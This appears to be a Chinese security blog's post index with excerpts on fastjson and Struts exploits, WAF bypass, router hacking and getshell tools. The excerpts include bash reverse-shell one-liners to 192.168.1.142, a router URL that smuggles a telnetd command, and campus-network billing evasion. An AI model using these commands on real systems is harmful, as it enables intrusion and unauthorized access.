fastjson<1.2.47 RCE 漏洞复现

这两天爆出了 fastjson 的老洞,复现简单记录一下。

首先使用 spark 搭建一个简易的利用 fastjson 解析 json 的 http server。

Read more

反弹shell以及端口转发的方法收集

Bash

1
bash -i >& /dev/tcp/192.168.1.142/80 0>&1
1
2
3
4
exec 5<>/dev/tcp/192.168.1.142/80
cat <&5 | while read line; do $line 2>&5 >&5; done
# or:
while read line 0<&5; do $line 2>&5 >&5; done
Read more

关于msf反弹后门的免杀Tips

msf是一个很强大的工具,我经常会在渗透用它来反弹shell,不过它生成的反弹后门会被不少杀软kill,这篇文章只是讲讲我在msf中一个简单的免杀小技巧

Read more

s2-045漏洞批量检测工具

今天晚上看老铁们在群里就这个st2-045漏洞讨论得火热,个人不太喜欢日站,本来想直接写个批量挂马的东西,但是想想还是算了,如果你有兴趣,改改也很容易,反正不关我的事

测试图
TIM图片20170307212124.png

Read more

Windows FindFirstFile利用

目前大多数程序都会对上传的文件名加入时间戳等字符再进行MD5,然后下载文件的时候通过保存在数据库里的文件ID读取文件路径,一样也实现了文件下载,这样我们就无法直接得到我们上传的webshell文件路径,但是当在Windows下时,我们只需要知道文件所在目录,然后利用Windows的特性就可以访问到文件,这是因为Windows在搜索文件的时候使用了FindFirstFile这一个winapi函数,该函数到一个文件夹(包含子文件夹)去搜索指定文件。

利用方法很简单,我们只要将文件名不可知部分之后的字符用”<”或者”>”代替即可,不过要注意一点是,只使用一个”<”或者”>”则只能代表一个字符,如果文件名是12345或者更长,这时候请求”1<”或者”1>”都是访问不到文件的,需要”1<<”才能访问到,代表继续往下搜索,有点像Windows的短文件名,这样我们还可以通过这个方式来爆破目录文件了。

Read more

wqCms6.0在IIS6的Getshell

2017-02-15发布

一、漏洞利用点

漏洞文件:admin_UploadDataHandler.ashx 自定义构造上传点

Read more

PHP DOS漏洞的新利用:CVE-2015-4024 Reviewed

1. 背景介绍

今天我们想从2015.04.03的一个PHP远程dos漏洞(CVE-2015-4024)说起。技术细节见如下链接,https://bugs.php.net/bug.php?id=69364。因为php解析body part的header时进行字符串拼接,而拼接过程重复拷贝字符导致DOS。事实上该漏洞还有其他非dos的利用价值,其中之一,就是绕过当前各种云WAF的文件上传防御策略。

目前国内外流行的云WAF厂商有如百度云加速,360网站卫士,加速乐,云盾等。因为PHP远程dos漏洞及PHP官方修复方案的特点,我们成功利用该漏洞绕过了当前主流WAF的文件上传防御,例如百度云加速、360网站卫士、知道创于加速乐、安全狗。

接下来,我们以PHP为例,详细解析我们的绕过方法。

2. 绕过WAF的原理

根据PHP DOS漏洞原理,在multipart_buffer_headers函数解析header对应value时,value值存在n行。每行的字符串以空白符开头或不存字符’:’,都触发以下合并value的代码块。那么解析header的value就要执行(n-1)次合并value的代码块,从而导致DOS。

Read more

基于Openwrt+Shadowsocks+ipv6实现校园网免流量无限时长上网

转载自Dyhube

简述

笔者利用笔记本电脑实现ipv6免费上网已经有一段时间了,原理是通过ipv6访问ipv4资源,在学校网络不限流量、不限时长、20兆带宽(我们学校ipv6限速上下对等20兆,没办法!),电脑开热点全寝室共用,那真是爽翻天 !

ipv6

Read more

OpenWRT路由器使用ipv6拨号上网教程

文章来源于群友,如有侵权,请联系我(aha971030@gmail.com)删除

原理介绍分析:

湖北E信地区可以使用ipv6拨号,好处是网络是上下对等不限速网络,也就是说,你的端口上限是多少,网上就可以达到多少,我测试很多次,一般在100M左右,但是遗憾的是,该拨号方式只能使用32位系统,且由于E信软件的兼容性问题,很容易导致蓝屏死机。经过大神的抓包分析,该拨号方式是使用ipv6的隧道协议传递ipv4信号。而幸运的是,现在的openwrt支持该协议。也就是说可以使用基于openwrt的路由器采用ipv6拨号。

操作步骤:

首先要明确是,该拨号方式也是需要进行账号换算的,首先启动路由器,并插上网线,在电脑上下载winscp这款软件,然后我们查询一下我们的ip地址,在电脑的dos界面输入ipconfig,找到以太网配置器

network111

Read more

给斐讯K1刷机并拨号e信(湖北地区测试无问题)

◆购买斐讯k1路由器

路由器在天猫京东斐讯旗舰店都有售卖,我买的价格是159,不过有一张铃铛卡,一个月之后返还160元,相当于0元购

◆路由器刷不死Breed

1.路由与电脑有线连接好,输入192.168.2.1,完成设置

k1basicSetting

2.在浏览器地址栏输入:http://192.168.2.1/goform/Diagnosis?pingAddr=192.168.2.100|echo""|telnetd

(如果你的电脑ip不是192.168.2.100,请改成你电脑的ip(内网ip))

Read more

MetInfo V5.1 GetShell一键化工具


漏洞解析:


config/config.inc.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
$langoks = $db->get_one("SELECT * FROM $met_lang WHERE lang='$lang'");

if(!$langoks)die('No data in the database,please reinstall.');

if(!$langoks[useok]&&!$metinfoadminok)okinfo('../404.html');

if(count($met_langok)==1)$lang=$met_index_type;

$query = "SELECT * FROM $met_config WHERE lang='$lang' or lang='metinfo'";//看这里

$result = $db->query($query);

while($list_config= $db->fetch_array($result)){

if($metinfoadminok)$list_config['value']=str_replace('"', '&#34;', str_replace("'", '&#39;',$list_config['value']));

$settings_arr[]=$list_config;

if($list_config['columnid']){

$settings[$list_config['name'].'_'.$list_config['columnid']]=$list_config['value'];

}else{

$settings[$list_config['name']]=$list_config['value'];

}

}

@extract($settings);

Read more